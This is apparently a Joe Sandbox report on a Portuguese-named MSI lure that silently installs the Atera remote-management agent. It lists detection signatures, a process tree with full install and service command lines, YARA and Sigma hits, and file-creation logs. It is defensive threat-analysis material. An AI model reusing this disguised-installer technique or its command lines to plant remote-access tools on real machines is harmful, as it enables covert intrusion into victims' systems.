Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TRABALHO----PROCESSO0014S55-S440000000S1.msi

Overview

General Information

Sample name:TRABALHO----PROCESSO0014S55-S440000000S1.msi
Analysis ID:1524137
MD5:50159e0e7acfd900e3190f860297d1e6
SHA1:d4f6302266269f2bddfaaa96625dd3d391e11e25
SHA256:9104930a661af5e641ad911fc30c0887433713ea589e389f06cbd5bb0a7ed5ad
Tags:msiuser-Porcupine
Infos:

Detection

AteraAgent
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AteraAgent
AI detected suspicious sample
Creates files in the system32 config directory
Installs Task Scheduler Managed Wrapper
Queries disk data (e.g. SMART data)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Is looking for software installed on the system
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7472 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\TRABALHO----PROCESSO0014S55-S440000000S1.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7568 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7632 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 460615119F137567DDB08B202FD1B71F MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7700 cmdline: rundll32.exe "C:\Windows\Installer\MSI9B15.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5020687 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7808 cmdline: rundll32.exe "C:\Windows\Installer\MSIA259.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5022328 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7884 cmdline: rundll32.exe "C:\Windows\Installer\MSIB4E8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5027093 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7508 cmdline: rundll32.exe "C:\Windows\Installer\MSID8C1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5036234 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7960 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0C14E813FE9B8F63433BCCF076E5DD5E E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • net.exe (PID: 8000 cmdline: "NET" STOP AteraAgent MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8052 cmdline: C:\Windows\system32\net1 STOP AteraAgent MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • taskkill.exe (PID: 8080 cmdline: "TaskKill.exe" /f /im AteraAgent.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AteraAgent.exe (PID: 8144 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="barrostransportes2018@gmail.com" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000MHGA9IAP" /AgentId="3757c761-9e50-4f15-8086-0e584dceea48" MD5: 477293F80461713D51A98A24023D45E8)
    • msiexec.exe (PID: 6516 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C5D300CFA650AF8B39098EE9450EC910 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 7760 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • AteraAgent.exe (PID: 7016 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 1792 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7892 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "c0a02000-d8db-4c72-a990-e7e78fb2c44b" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7880 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "08ea1206-2fa8-46b2-a7c8-5fb30d3b6805" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000MHGA9IAP MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 8112 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "7cd28163-b1ef-497f-b073-8581f0695073" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000MHGA9IAP MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 2508 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "cc07350c-f483-47f0-a322-e5655b4447fa" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000MHGA9IAP MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4008 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cscript.exe (PID: 7808 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • AgentPackageSTRemote.exe (PID: 3916 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "463fd9d0-b270-46be-8e66-442f10d730f6" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000MHGA9IAP MD5: 749C51599FBF82422791E0DF1C1E841C)
      • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageMonitoring.exe (PID: 2120 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "8a9134ff-5e44-480a-9a18-d667aeeec188" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000MHGA9IAP MD5: B50005A1A62AFA85240D1F65165856EB)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AteraAgent.exe (PID: 1504 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 3920 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 8036 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "5fd723dc-67af-48d2-add5-cb21dbd46c10" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo" 001Q300000MHGA9IAP MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8028 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cscript.exe (PID: 8064 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • AgentPackageUpgradeAgent.exe (PID: 7956 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "d4d269d4-e88c-4b28-b73e-8aa8339ce0f7" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000MHGA9IAP MD5: D11B2139D29E79D795054C3866898B7F)
      • conhost.exe (PID: 2196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1468 cmdline: "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart MD5: E5DA170027542E25EDE42FC54C929077)
    • AgentPackageTicketing.exe (PID: 8096 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "10a783e3-c632-4a9e-aced-d9359a7beffe" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000MHGA9IAP MD5: B39264220D20A5C2807CDA3EA5F6B772)
      • conhost.exe (PID: 1624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageProgramManagement.exe (PID: 8132 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "83c4b87a-e204-4da6-bcee-e7b8e82431d2" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000MHGA9IAP MD5: E32856BEF4126DF5FB008E0EC9E7A3DD)
      • conhost.exe (PID: 2340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageInternalPoller.exe (PID: 5456 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "66f79428-b794-442f-982d-2e0a02b56009" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000MHGA9IAP MD5: 01807774F043028EC29982A62FA75941)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageMarketplace.exe (PID: 6428 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "487fa34b-77da-4f1b-8f72-efcd0c681b03" agent-api.atera.com/Production 443 or8ixLi90Mf "agentprovision" 001Q300000MHGA9IAP MD5: EFB4712C8713CB05EB7FE7D87A83A55A)
      • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageMonitoring.exe (PID: 7808 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "536561ff-dfee-40bc-945b-5b9b9c53fde8" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000MHGA9IAP MD5: B50005A1A62AFA85240D1F65165856EB)
  • sppsvc.exe (PID: 8188 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 7736 cmdline: C:\Windows\System32\svchost.exe -k smphost MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • AgentPackageUpgradeAgent.exe (PID: 2260 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun MD5: D11B2139D29E79D795054C3866898B7F)
    • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Config.Msi\4c9994.rbsJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
    C:\Windows\Temp\~DF6D3CFC025FA64744.TMPJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
      C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txtJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exeJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
            Click to see the 105 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000037.00000002.2103371672.000001CC12F4A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
              00000037.00000002.2103371672.000001CC12F4E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                0000001A.00000002.2152969045.000001A8819BC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                  0000001A.00000002.2141115637.000001A8810EF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                    0000002C.00000002.2110035392.000001F140C40000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                      Click to see the 389 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      22.2.AgentPackageAgentInformation.exe.26ad1de0000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                        55.0.AgentPackageInternalPoller.exe.1cc122b0000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                          51.0.AgentPackageTicketing.exe.24844c30000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                            26.2.AteraAgent.exe.1a88220e3d8.2.raw.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                              20.0.AgentPackageAgentInformation.exe.1fd40e70000.0.unpackJoeSecurity_AteraAgentYara detected AteraAgentJoe Security
                                Click to see the 15 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: HackTool - CACTUSTORCH Remote Thread Creation
                                Source: Threat createdAuthor: @SBousseaden (detection), Thomas Patzke (rule): Data: EventID: 8, SourceImage: C:\Windows\System32\cscript.exe, SourceProcessId: 7808, StartAddress: CC2D6180, TargetImage: C:\Windows\SysWOW64\rundll32.exe, TargetProcessId: 7808
                                Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
                                Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\cscript.exe, SourceProcessId: 7808, StartAddress: CC2D6180, TargetImage: C:\Windows\SysWOW64\rundll32.exe, TargetProcessId: 7808
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4008, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ProcessId: 7808, ProcessName: cscript.exe
                                Sigma detected: Net.exe Execution
                                Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 0C14E813FE9B8F63433BCCF076E5DD5E E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7960, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8000, ProcessName: net.exe
                                Sigma detected: Stop Windows Service Via Net.EXE
                                Source: Process startedAuthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 0C14E813FE9B8F63433BCCF076E5DD5E E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7960, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8000, ProcessName: net.exe
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalService -s W32Time, ProcessId: 7760, ProcessName: svchost.exe

                                Suricata Signatures

                                No Suricata rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for dropped file
                                Source: 4c9995.rbf (copy)ReversingLabs: Detection: 26%
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeReversingLabs: Detection: 26%
                                Multi AV Scanner detection for submitted file
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msiReversingLabs: Detection: 24%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.8% probability
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC4BC0 CryptAcquireContextW,GetLastError,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext,37_2_00007FFB02EC4BC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC4E20 CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptDestroyHash,37_2_00007FFB02EC4E20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02EC4DE0 CryptReleaseContext,37_2_00007FFB02EC4DE0
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA NetworksJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgentJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.configJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\sharedJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.AppJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebHeaderCollection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-fibers-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Buffers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Linq.Expressions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-errorhandling-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-multibyte-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-time-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Specialized.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Windows.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Reader.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Overlapped.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\coreclr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Metadata.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-private-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-math-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.dllJump to behavior
